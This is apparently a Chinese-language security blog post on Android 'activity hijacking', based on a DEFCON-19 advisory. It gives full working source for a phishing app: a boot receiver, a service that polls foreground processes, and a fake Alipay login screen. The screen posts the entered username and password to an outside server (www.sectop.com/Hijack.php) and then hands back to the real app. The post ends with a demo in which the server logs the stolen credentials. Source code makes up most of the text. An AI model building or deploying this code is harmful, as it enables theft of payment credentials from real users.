android安全-activity劫持

一、activity劫持简介

DEFCON-19上公布的，原文见
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-008.txt

android运行时，会在很多activity中进行切换，它自身维护着一个activity的历史栈，用于在用户点击back时，恢复前一个activity，栈顶指向当前显示的activity。

原文如下：

http://developer.android.com/guide/topics/fundamentals/tasks-and-back-stack.html

在我们使用intent开启activity时，intent有一个选项FLAG_ACTIVITY_NEW_TASK，可以使得这个activity位于栈顶

http://developer.android.com/reference/android/content/Intent.html#FLAG_ACTIVITY_NEW_TASK

如果我们注册一个receiver，响应android.intent.action.BOOT_COMPLETED，使得开启启动一个service；这个service，会启动一个计时器，不停枚举当前进程中是否有预设的进程启动，如果发现有预设进程，则使用FLAG_ACTIVITY_NEW_TASK启动自己的钓鱼界面，截获正常应用的登录凭证。

 

二、实例

androidmanifest.xml

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

<? xml version = "1.0" encoding = "utf-8" ?> < manifest xmlns:android = "http://schemas.android.com/apk/res/android"        package = "com.xiaod.Hijack"        android:versionCode = "1"        android:versionName = "1.0" >      < uses-sdk android:minSdkVersion = "3" />      < uses-permission android:name = "android.permission.RECEIVE_BOOT_COMPLETED" ></ uses-permission >      < uses-permission android:name = "android.permission.INTERNET" />      < application android:icon = "@drawable/icon" android:label = "@string/app_name" android:name = ".HijackApplication" >          < activity android:name = ".HijackActivity"                    android:label = "@string/app_name" >              < intent-filter >                  < action android:name = "android.intent.action.MAIN" />                  < category android:name = "android.intent.category.LAUNCHER" />              </ intent-filter >          </ activity >          < activity android:name = ".AlipayLogin" android:noHistory = "true" android:windowSoftInputMode = "adjustResize" />        < service android:name = ".HijackService" android:label = "Hijack Service" >              < intent-filter >                  < action android:name = "com.xiaod.Hijack.service.Hijack" />              </ intent-filter >          </ service >          < receiver          android:name = ".HijackReceiver"          android:enabled = "true"          android:exported = "true"          android:label = "Hijack Receiver" >              < intent-filter >                  < action android:name = "android.intent.action.BOOT_COMPLETED" />              </ intent-filter >          </ receiver >      </ application > </ manifest >

HijackReceiver.java 用于开机启动HijackService

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

package com.xiaod.Hijack;   import android.content.BroadcastReceiver; import android.content.Context; import android.content.Intent; import android.util.Log;   public class HijackReceiver extends BroadcastReceiver{        @Override      public void onReceive(Context context, Intent intent) {          if (intent.getAction().equals( "android.intent.action.BOOT_COMPLETED" )) {              Intent serviceIntent = new Intent(context, HijackService. class );              context.startService(serviceIntent);          }      } }

HijackService.java用于判断正常应用是否启动，如果启动则开启劫持activity

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66

package com.xiaod.Hijack;   import java.util.HashMap; import java.util.List; import java.util.Timer; import java.util.TimerTask;   import android.app.ActivityManager; import android.app.ActivityManager.RunningAppProcessInfo; import android.app.Service; import android.content.Context; import android.content.Intent; import android.os.IBinder; import android.util.Log;   public class HijackService extends Service{      Timer mTimer = new Timer();      //新建一个定时任务      TimerTask mTimerTask = new TimerTask() {          @Override          public void run() {              // TODO Auto-generated method stub              //获取当前运行的进程列表              ActivityManager activityManager = (ActivityManager) getSystemService( Context.ACTIVITY_SERVICE );              List<RunningAppProcessInfo> appProcesses = activityManager.getRunningAppProcesses();                //枚举进程              for (RunningAppProcessInfo appProcess : appProcesses) {                  //如果APP在前台                  if (appProcess.importance == RunningAppProcessInfo.IMPORTANCE_FOREGROUND) {                      //APP是否在需要劫持的列表中                      if (mVictims.containsKey(appProcess.processName)) {                          if (((HijackApplication)getApplication()).getHasHijackStart() == false )                          {                              Intent dialogIntent = new Intent(getBaseContext(), mVictims.get(appProcess.processName));                              //设置启动的activity位于栈顶                              dialogIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);                              getApplication().startActivity(dialogIntent);                              ((HijackApplication)getApplication()).setHasHijackStart( true );                          }                      }                  }              }              Log.e( "HijackService_TimerTask" , "here" );          }        };      HashMap<String,Class<?>> mVictims = new HashMap<String,Class<?>>();      long delay = 1000 ;      long period = 1000 ;        @Override      public void onStart(Intent intent, int startid) {            //设置需要劫持的应用          mVictims.put( "com.eg.android.AlipayGphone" , AlipayLogin. class );          //开启计时任务          mTimer.scheduleAtFixedRate(mTimerTask, delay, period);      }        @Override      public IBinder onBind(Intent arg0) {          // TODO Auto-generated method stub          return null ;      } }

AlipayLogin.java 是伪造的界面，用于获取用户凭证并发送到指定地址，并返回正常应用

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83

package com.xiaod.Hijack;   import java.util.ArrayList; import java.util.List;   import org.apache.http.HttpResponse; import org.apache.http.NameValuePair; import org.apache.http.client.entity.UrlEncodedFormEntity; import org.apache.http.client.methods.HttpPost; import org.apache.http.impl.client.DefaultHttpClient; import org.apache.http.message.BasicNameValuePair; import org.apache.http.protocol.HTTP;   import android.app.Activity; import android.os.Bundle; import android.view.View; import android.view.View.OnClickListener; import android.view.Window; import android.widget.Button; import android.widget.EditText;   public class AlipayLogin extends Activity {      private Button mBtnLogin;      private Button mBtnReg;      private EditText mEdtUser;      private EditText mEdtPwd;      @Override      public void onCreate(Bundle savedInstanceState) {          super .onCreate(savedInstanceState);          requestWindowFeature(Window.FEATURE_NO_TITLE);          setContentView(R.layout.alipay_login);                  mBtnLogin = (Button) findViewById(R.id.btn_login);          mBtnReg = (Button) findViewById(R.id.btn_reg);          mEdtUser = (EditText) findViewById(R.id.et_user);          mEdtPwd = (EditText) findViewById(R.id.et_pwd);            mBtnLogin.setOnClickListener( new OnClickListener() {                @Override              public void onClick(View v) {                  // TODO Auto-generated method stub                  sendInfo(mEdtUser.getText().toString(), mEdtPwd.getText().toString());                  moveTaskToBack( true );              }            });            mBtnReg.setOnClickListener( new OnClickListener() {                @Override              public void onClick(View v) {                  // TODO Auto-generated method stub                  sendInfo(mEdtUser.getText().toString(), mEdtPwd.getText().toString());                  moveTaskToBack( true );              }            });      }      public void onBackPressed() {          moveTaskToBack( true );      }        private boolean sendInfo(String user, String pwd) {          HttpPost request = new HttpPost( "http://www.sectop.com/Hijack.php" );          List<NameValuePair> params = new ArrayList<NameValuePair>();          params.add( new BasicNameValuePair( "user" , user));          params.add( new BasicNameValuePair( "pwd" , pwd));            try {              request.setEntity( new UrlEncodedFormEntity(params, HTTP.UTF_8));              HttpResponse response = new DefaultHttpClient().execute(request);              if (response.getStatusLine().getStatusCode() == 200 ) {                  return true ;              }              else {                  return false ;              }          } catch (Exception e) {          }          return false ;      } }

演示效果如下：

启动正常应用

 

这时恶意的后台service启动了伪造的activity

当用户输入凭证之后

 

恶意activity记录下凭证，并跳回到正常应用

在远端服务器已经记录下了用户凭证